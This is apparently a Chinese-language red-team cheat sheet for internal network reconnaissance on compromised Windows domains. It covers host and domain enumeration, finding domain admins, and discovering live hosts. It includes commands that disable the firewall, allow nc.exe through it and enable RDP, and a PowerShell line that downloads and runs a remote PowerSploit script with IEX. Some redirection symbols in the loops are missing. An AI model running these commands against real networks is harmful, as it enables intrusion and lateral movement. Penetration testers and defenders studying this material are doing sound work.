内网信息收集

收集本机信息

手动信息搜集

查询网络配置信息

1

ipconfig /all

查询操作系统及软件的信息

查询操作系统和版本信息

1

2

systeminfo | findstr /B /C:'OS Name' /C:'OS Version'

systeminfo | findstr /B /C:'OS name' /C:'OS version'

查询系统体系结构

1

echo %PROCESSOR_ARCHITECTURE%

查看安装的软件、版本及路径等

1

wmic product get name, version

1

powershell 'Get-WmiObject -class Win32_Product | select-Object -Property name, version'

查询本机服务

1

wmic service list brief

查询进程列表

1

2

tasklist

wmic process list brief

查看启动程序信息

1

wmic startup get command, caption

查看计划任务

1

schtasks /query /fo LIST /v

查看主机开机时间

1

net statistics workstation

查询用户列表

1

2

3

4

net user

net localgroup administrators

# Query online users:

query user || qwinsta

列出或断开本地计算机与所连接的客户端之间的会话

1

net session

查询端口列表

1

netstat -ano

查看补丁列表

1

systeminfo

1

wmic qfe get Caption, Description, HotfixID, InstalledOn

查询本机共享列表

1

2

net share

wmic share get name,path,status

查询路由表及所有可用接口的ARP缓存表

1

2

route print

arp -a

查询防火墙相关配置

关闭防火墙

Windows 2003 version

1

netsh firewall set opmode disable

Windows 2003 later version

1

netsh firewall set allprofiles state off

修改防火墙配置

Version before Windows 2003

1

netsh firewall add allowedprogram c:\nc.exe 'allow nc' enable

Windows 2003 later version

1

netsh firewall add rule name='pass nc' dir=in action=allow program='C:\nc.exe'

Allow the specified program to be connected

1

netsh advfirewall firewall add rule name='Allow nc' dir=out action=allow program='C:\nc.exe'

Allow 3389 to release

1

netsh advfirewall firewall add rule name='Remote Desktop' protocol=TCP dir=in localport=3389 action=allow

自定义防火墙日志的存储位置

1

netsh advfirewall firewall set currentprofile logging filename 'C:\windows\temp\fw.log'

查看代理情况

1

reg query 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings'

查询并开启远程连接服务

查看远程连接端口

1

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /V PortNumber

0xd3d converts to decimal to 3389

在Windows Server2003中开启3389端口

1

wmic path win32_terminalservicesetting where(__CLASS!='') call setallowtsconnections 1

在Windows Server2008和Windows Server2012中开启3389端口

1

2

3

4

5

6

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS!='') call setallowsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=’RDP-Tcp’) call

setupuserauthenticationrequired 1

reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

自动化收集信息

Empire下的主机信息搜集

查看本机用户、域成员、密码设置时间、剪切板内容、系统基本信息、网络适配器信息、共享信息

1

usemodule situational_awareness/host/winenum

1

situational_awareness/host/computerdetails

查询当前权限

查询当前权限

1

Whoami

Three situations:

Local regular users

Local Admin User

Domain users

获取域 SID

1

whoami /all

查询指定用户的详细信息

1

net user XXX /domain

判断是否存在域

使用 ipconfig 命令

1

ipconfig /all

查看系统详细信息

1

systeminfo

查询当前登录域及用户信息

1

net config workstation

判断主域

1

net time /domain

After executing the command, there are three situations:

Domain exists: not currently the domain user

System error occurred

Domain exists: and the current user is a domain user

As shown in the picture above

The current network environment is a working group

Domain controller not found

探测内网存活主机

利用 NetBIOS 快速探测内网

1

nbtscan.exe 192.168.1.0/20

利用 ICMP 协议快速探测内网

1

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr 'TTL='

通过 ARP 扫描探测内网

arp-scan工具

1

arp.exe -t 192.168.1.0/20

Empire 中的 ARPscan 模块

1

usemodule situational_awareness/network/arpscan

Nishang 中的 Invoke-ARPScan.ps1 脚本

1

powershell.exe -exec bypass -Command '{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}' C:\Windows\temp\log.txt

扫描内网端口

metasploit 端口扫描

1

auxiliary/scanner/portscan/tcp

PowerSploit 的 Invoke-portscan.ps1 脚本

1

powershell.exe -nop -exec bypass -c 'IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/POwershellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\rex.txt'

Nishang 的 Invoke-PortScan 模块

1

Invoke-Portscan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost

端口 banner 信息

收集域内基础信息

查询域

1

net view /domain

查询域内所有计算机

1

net view /domain:HACKE

查询域内所有用户列表

1

net group /domain

查询域内所有成员计算机列表

1

net group 'domain computers' /domain

查询域密码信息

1

net accounts /domain

获取域信任信息

1

nltest /domain_trusts

查找域控制器

查看域控制器的机器名

1

nltest /DCLIST:DomainName

查看域控制器的主机名

1

nslookup -type=SRV _ldap._tcp.

查看当前时间

1

net time /domain

查看域控制器组

1

net group 'Domain Controllers' /domain

1

netdom query pdc

获取域内的用户和管理员信息

查询所有域用户列表

向域控服务器进行查询

1

net user /domain

获取域内用户的详细信息

1

wmic useraccount get /all

查看存在的用户

1

dsquery user

查询本地管理员组用户

1

net localgroup administrators

查询域管理员用户

查询域管理员用户

1

net group 'domain admins' /domain

查询管理员用户

1

net group 'Enterprise Admins' /domain

定位域管理员

常用工具

pslogon.exe

1

pslogon.exe \\DC

PVEFindADUser.exe

1

PVEFindADUser.exe -current

netview.exe

nmap的脚本

Collect information on domain control, and you can obtain host information, user and other information

smb-enum-sessions.nse

Obtain permissions to a certain host, but cannot obtain more domain user information

Smb-enum-users.nse

Iterate through the shared directory of the remote host

smb-enum-shares.nse

Traversal of the host remote process

smb-enum-process.nse

Information about the host's operating system, computer name, domain name, domain forest name, NetBIOS machine name, workgroup, system time, etc.

smb-os-discovery

powerview脚本

Invoke-StealthUserHunter

Invoke-UserHunter

Empire 的 user_hunter模块

1

usemode situational_awareness/network/powerview/user_hunter

查找域管进程

本机检查

获取域管理员列表

1

net group 'Domain Admins' /domain

列出本机的所有进程及进程用户

1

tasklist /v

查询域控的域用户会话

https://github.com/nullbind/Other-Projects/tree/master/GDA

查询远程系统中运行的任务

First, collect the domain administrator list from the Domain Admins group

Then, add the target ip to ips.txt and add the collected domain administrator list to the names.txt file.

1

2

FOR /F %i in (ips.txt) DO @echo [+] %i @tasklist /V /S %i /U user /P password 2NUL output.txt

FOR /F %n in (names.txt) DO @type output.txt | findstr %n NUL echo [!] %n was found running a process on %i pause

扫描远程系统的 NetBIOS 信息

First, collect the domain administrator list from the Domain Admins group

Then, add the target ip to ips.txt and add the collected domain administrator list to the admins.txt` file.

1

for /F %i in (ips.txt) do @echo [+] Checking %i nbtstat -A %i 2NUL nbsessions.txt FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n NUL echo [!] %n was found logged into %i

BloodHound 工具

1

brew services start neo4j

收集脚本

https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors

1

SharpHound.exe -c all